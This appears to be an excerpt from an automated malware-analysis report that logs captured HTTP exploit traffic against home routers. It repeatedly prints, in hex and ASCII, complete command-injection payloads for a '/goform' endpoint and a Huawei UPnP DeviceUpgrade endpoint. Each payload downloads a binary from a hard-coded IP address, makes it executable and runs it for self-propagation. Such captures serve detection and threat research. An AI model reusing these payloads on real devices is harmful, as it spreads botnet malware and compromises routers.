                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
